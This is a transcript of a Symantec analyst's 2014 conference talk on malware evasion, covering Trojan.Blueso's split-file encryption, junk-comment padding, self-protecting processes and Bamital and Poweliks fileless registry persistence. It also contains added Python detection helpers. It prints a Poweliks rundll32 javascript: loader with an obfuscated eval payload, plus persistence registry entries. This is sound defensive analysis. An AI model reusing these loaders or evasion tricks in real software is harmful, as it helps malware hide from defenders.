Code Blue 2014: How to avoid the detection by malware, by Hiroshi Shinotsuka
TRANSCRIPT
Self-introduction
Copyright © 2014 Symantec Corporation 2
• Threat analysis engineer at Symantec.
• Analyze suspicious files and create Anti-Virus signatures
• Provide detailed technical descriptions to customers on demand
• Publicly provide malware-related information
Attacker's techniques to avoid detection
1 Store decryption key and data in separate files
2 Large amount of junk code
3 Process protection
4 Store malicious code outside of files (fileless malware)
Trojan.Blueso detection
[Chart: Trojan.Blueso detection count per month, August through November; y-axis from 0 to 35,000]
Trojan.Blueso file structure
RAR self-extracting file, 13 MB
AutoIt executable file
Decryption code script file
Decryption key configuration file
Encrypted code
AutoIt is a programming language for the Microsoft Windows platform. The AutoIt syntax is very similar to that of the BASIC programming language and is designed to automate the Windows GUI.
The RAR self-extracting file drops 4 files, then it executes the AutoIt script.
Decrypted code
Blueso injects Backdoor.Trojan
[Diagram labels: Code, Decryption key, Encrypted code, AutoIt executable, Legitimate Windows Process, Decryption, Decrypted code, Part of decrypted code, Internet Explorer Process, Watch Dog monitor]
[Diagram labels: File deleted, Process deleted, Create Process, Inject, Create File]
Trojan.Blueso recreates the file, registry entry and process again if antivirus deletes them.
Attacker's techniques to avoid detection
1 Store decryption key and data in separate files
2 Large amount of junk code
3 Process protection
4 Store malicious code outside of files (fileless malware)
Traditional sample
Packer / Self update
• Harder to detect encrypted files.
• A traditional sample stored all information in a single file.
Code
Decryption key
Encrypted code
Code
Decrypted malicious code
New technique to avoid detection
Traditionally, malware saved its decrypted image to a file and executed it. The antivirus scanner detects the malware at the moment it writes that decrypted image onto the disk.
The new technique is to inject the decrypted image into a running process and execute it there, so that the file scan never sees the decrypted image.
Decrypted malicious code
Legitimate Windows Process: Decrypt in memory
Decrypted malicious code Code
Decryption key
Encrypted code
AutoIt executable
Antivirus scanner scans each file.
Why the attacker split the malware into four separate files
[Diagram: each of the four files is scanned separately: AutoIt executable, Decryption code, Decryption key setting file, Encrypted code]
What does this mean?
• Hiding malicious code by encrypting it
• Storing the code, the decryption key and the encrypted code in separate files.
• The antivirus scanner can't determine that the 'encrypted code' is a malicious file.
• The antivirus scanner can't detect the file without understanding the relationships between multiple files.
Attacker's techniques to avoid detection
1 Store decryption key and data in separate files
2 Large amount of junk code
3 Process protection
4 Store malicious code outside of files (fileless malware)
Code (beginning of file)
• TAB character is replaced with a 1-byte string
• You only see junk comment lines!
Code
Finally, at line 23670 (16 MB into the file), the important code is reached. The script is 87476 lines of AutoIt code, but only 900 lines remain once comment lines are removed: only 1% is important code.
Antivirus scan method
• An antivirus scanner needs to balance detection against performance
• An antivirus scanner first determines the file type and starts the file scan based on the detected file type.
Executable file
ZIP file
JPEG file
No special file structure in text file/script file.
Script files have no file header, which means the files have no special file structure.
The antivirus scanner needs to run a partial scan and determine what the file is.
It is very difficult to keep scan performance when a malicious script contains so much comment/junk code.
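As an added illustration of the comment-padding problem described above (example code written for this transcript, not from the talk or from Symantec): a small Python analyzer that strips AutoIt line comments (`;`) and block comments (`#cs`/`#ce`, `#comments-start`/`#comments-end`) and reports the fraction of real code, flagging scripts whose real-code fraction is as tiny as Blueso's. The sample script and the thresholds are constructed for the demonstration.

```python
import re

# Constructed sample: an AutoIt script padded with junk comment lines so that,
# like the Blueso script in the talk, only about 1% of the lines are real code.
SAMPLE_SCRIPT = (
    "; junk comment line\n" * 200
    + "#cs\nblock of junk\nmore junk\n#ce\n"
    + 'Global $key = FileRead("key.cfg")\n'
    + "; another junk line\n" * 100
    + 'Global $data = FileRead("payload.bin")\n'
    + "Func Decrypt($k, $d)\n"
    + "    Return BinaryToString($d)  ; trailing comment stays code\n"
    + "EndFunc\n"
)

LINE_COMMENT = re.compile(r"^\s*;")
BLOCK_START = re.compile(r"^\s*#(cs|comments-start)\b", re.I)
BLOCK_END = re.compile(r"^\s*#(ce|comments-end)\b", re.I)


def autoit_code_lines(text):
    """Return the lines of an AutoIt script that are neither comments nor blank."""
    code = []
    in_block = False
    for line in text.splitlines():
        if in_block:
            if BLOCK_END.match(line):
                in_block = False
            continue
        if BLOCK_START.match(line):
            in_block = True
            continue
        if not line.strip() or LINE_COMMENT.match(line):
            continue
        code.append(line)
    return code


def junk_ratio_report(text, min_lines=100, max_code_ratio=0.05):
    """Flag a script that is large but almost entirely comments (thresholds are assumptions)."""
    total = len(text.splitlines())
    code = autoit_code_lines(text)
    ratio = len(code) / total if total else 0.0
    return {
        "total_lines": total,
        "code_lines": len(code),
        "code_ratio": round(ratio, 4),
        "suspicious": total >= min_lines and ratio <= max_code_ratio,
    }


if __name__ == "__main__":
    print(junk_ratio_report(SAMPLE_SCRIPT))
```

Such a ratio is only a triage signal: a legitimate, heavily documented script can also score low, so the result should feed further inspection rather than a verdict.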
Attacker's techniques to avoid detection
1 Store decryption key and data in separate files
2 Large amount of junk code
3 Process protection
4 Store malicious code outside of files (fileless malware)
How does Blueso start and protect itself?
Code
Decryption key
Encrypted code
Legitimate Windows Process
Decryption
Internet Explorer process
Malware !! Malware ??
What is wrong ??
AutoIt executable
Process protection mechanism
1) Terminate Internet Explorer -> the malicious code injected into the legitimate Windows process executes it again
2) Terminate the legitimate Windows process -> the script running in AutoIt executes it again
3) Terminate AutoIt? -> the AutoIt executable is marked as an essential process for the Windows system by using the undocumented API NtSetInformationProcess
As soon as AutoIt is terminated, Windows treats it as an unrecoverable critical problem.
-> Blue Screen Of Death!!
Attacker's techniques to avoid detection
1 Store decryption key and data in separate files
2 Large amount of junk code
3 Process protection
4 Store malicious code outside of files (fileless malware)
Example of malware storing code/data in an irregular place (Bamital)
A registry entry is set so that the code starts when Windows restarts.
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Control\Session Manager\AppCertDlls\"AppSecDll" = "%USER_Profile%\Local Settings\Application Data\Windows Server\xblscp.dll"
Because of the analysis already performed, xblscp.dll is determined to be a malicious file.
Strictly speaking, does this file have malicious code in it?
Example of malware storing code/data in an irregular place (Bamital) 2
How it works
• Allocate memory
• Store data from the registry into the allocated memory
• Call the allocated memory
The antivirus scanner does not know the rule that governs the data. The data is written in the registry. Other malware uses the same technique with a file instead of the registry.
Example of malware storing code/data in an irregular place (Poweliks)
Trojan.Poweliks writes a Windows PowerShell script to the registry.
You can see that this registry entry may execute encrypted JavaScript.
The encrypted code that should be decrypted is in a different registry entry.
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\(Default) =
rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";eval(\"epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/S~S�e)(ILDS]]dmtje]]|84f81:�.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmYswfs43]]b(*,(=0tdsjqu?(*\".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
"a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@
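An added example, not from the talk: a Python triage helper that recognizes the rundll32 javascript: launcher shape shown above, recovers the payload by reversing the per-character `charCodeAt()-1` shift, and reports loader indicators in the decoded text. The registry value, the CLSID placeholder and the decoded script are constructed for the demonstration; this is not Symantec's detection logic.

```python
import re


def shift_chars(text, delta):
    """Shift every character code by delta; the Poweliks stub applies -1 at run time."""
    return "".join(chr(ord(c) + delta) for c in text)


# Constructed decoded payload: a loader that reads a second registry value
# (the "a" value shown in the talk) and feeds it to document.write as jscript.encode.
PLAINTEXT = ("document.write('<script language=jscript.encode>'"
             "+(new ActiveXObject('WScript.Shell')).RegRead("
             r"'HKLM\\Software\\Classes\\CLSID\\{CLSID-PLACEHOLDER}\\LocalServer32\\a')"
             "+'</script>')")

# Constructed LocalServer32 value in the same shape as the one on the slide.
REGISTRY_VALUE = (
    'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";'
    'eval("' + shift_chars(PLAINTEXT, +1) + '".replace(/./g,function(_)'
    '{return String.fromCharCode(_.charCodeAt()-1);}))'
)

# The eval(...).replace(...) stub; quotes may appear escaped (\") in registry dumps.
STUB_RE = re.compile(
    r'eval\(\\?"(?P<blob>.*?)\\?"\.replace\(/\./g,\s*function\(_\)\{return\s*'
    r'String\.fromCharCode\(_\.charCodeAt\(\)-(?P<delta>\d+)\);\}\)\)'
)
INDICATORS = ("ActiveXObject", "WScript.Shell", "RegRead", "jscript.encode")


def analyze_registry_value(value):
    """Flag a rundll32 javascript: launcher and recover its shifted payload."""
    lower = value.lower()
    report = {
        "rundll32_javascript": "rundll32" in lower and "javascript:" in lower,
        "decoded": None,
        "indicators": [],
    }
    m = STUB_RE.search(value)
    if m:
        decoded = shift_chars(m.group("blob"), -int(m.group("delta")))
        report["decoded"] = decoded
        report["indicators"] = [i for i in INDICATORS if i in decoded]
    return report


if __name__ == "__main__":
    print(analyze_registry_value(REGISTRY_VALUE))
```

The decoded text still only points at the second registry value; that value (the `"a"` entry above) is Windows Script Encoder output and needs its own decoding step before it can be read.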
Conclusion
• Attackers discover new techniques every day.
• Attackers employ techniques to make malware removal difficult
• File-based scanning is no longer effective
• Multi-layered security is becoming more important
Thank you!
Copyright © 2014 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.
This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.
Hiroshi Shinotsuka